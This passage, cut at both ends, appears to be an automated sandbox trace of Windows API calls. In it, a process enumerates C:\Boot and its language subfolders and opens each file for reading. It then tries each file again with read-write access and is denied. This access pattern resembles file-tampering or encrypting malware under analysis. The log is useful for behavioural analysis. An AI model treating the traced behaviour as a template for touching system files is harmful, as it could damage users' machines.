InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.791] AreFileApisANSI () returned 1 [0083.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.791] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0083.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.792] AreFileApisANSI () returned 1 [0083.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 30 [0083.792] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.792] GetFileType (hFile=0x340) returned 0x1 [0083.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.792] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.792] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.792] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.793] CloseHandle (hObject=0x340) returned 1 [0083.793] AreFileApisANSI () returned 1 [0083.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0083.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lv-LV\\bootmgr.exe.mui") returned 30 [0083.793] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.793] GetLastError () returned 0x5 [0083.793] GetLastError () returned 0x5 [0083.793] SetLastError (dwErrCode=0x5) [0083.793] GetLastError () returned 0x5 [0083.793] SetLastError (dwErrCode=0x5) [0083.793] GetLastError () returned 0x5 [0083.793] SetLastError (dwErrCode=0x5) [0083.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.793] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.793] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x690d8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧❘\x01⺊Ā")) returned 0 [0083.793] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0083.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.794] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0083.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.795] AreFileApisANSI () returned 1 [0083.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\memtest.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\memtest.exe", lpUsedDefaultChar=0x0) returned 20 [0083.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.795] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.795] AreFileApisANSI () returned 1 [0083.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0083.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a7b8 [0083.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\memtest.exe") returned 20 [0083.795] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0083.795] GetFileType (hFile=0x334) returned 0x1 [0083.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0083.795] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.795] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.796] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.796] CloseHandle (hObject=0x334) returned 1 [0083.796] AreFileApisANSI () returned 1 [0083.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0083.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ac38 [0083.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x7ac38, cchWideChar=20 | out: lpWideCharStr="C:\\Boot\\memtest.exe") returned 20 [0083.796] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.796] GetLastError () returned 0x5 [0083.796] GetLastError () returned 0x5 [0083.796] SetLastError (dwErrCode=0x5) [0083.796] GetLastError () returned 0x5 [0083.796] SetLastError (dwErrCode=0x5) [0083.796] GetLastError () returned 0x5 [0083.796] SetLastError (dwErrCode=0x5) [0083.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac38 | out: hHeap=0x20000) returned 1 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.797] AreFileApisANSI () returned 1 [0083.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\nb-NO", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\nb-NO", lpUsedDefaultChar=0x0) returned 14 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.797] AreFileApisANSI () returned 1 [0083.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0083.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nb-NO") returned 14 [0083.798] CreateFileW (lpFileName="C:\\Boot\\nb-NO" (normalized: "c:\\boot\\nb-no"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.798] GetLastError () returned 0x5 [0083.798] GetLastError () returned 0x5 [0083.798] SetLastError (dwErrCode=0x5) [0083.798] GetLastError () returned 0x5 [0083.798] SetLastError (dwErrCode=0x5) [0083.798] GetLastError () returned 0x5 [0083.798] SetLastError (dwErrCode=0x5) [0083.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.798] AreFileApisANSI () returned 1 [0083.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887c0 [0083.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x887c0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\nb-NO") returned 14 [0083.798] CreateFileW (lpFileName="C:\\Boot\\nb-NO" (normalized: "c:\\boot\\nb-no"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.798] GetLastError () returned 0x5 [0083.798] GetLastError () returned 0x5 [0083.798] SetLastError (dwErrCode=0x5) [0083.798] GetLastError () returned 0x5 [0083.798] SetLastError (dwErrCode=0x5) [0083.798] GetLastError () returned 0x5 [0083.798] SetLastError (dwErrCode=0x5) [0083.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.799] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.799] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.799] FindFirstFileExW (in: lpFileName="C:\\Boot\\nb-NO\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77f90 [0083.799] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.799] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 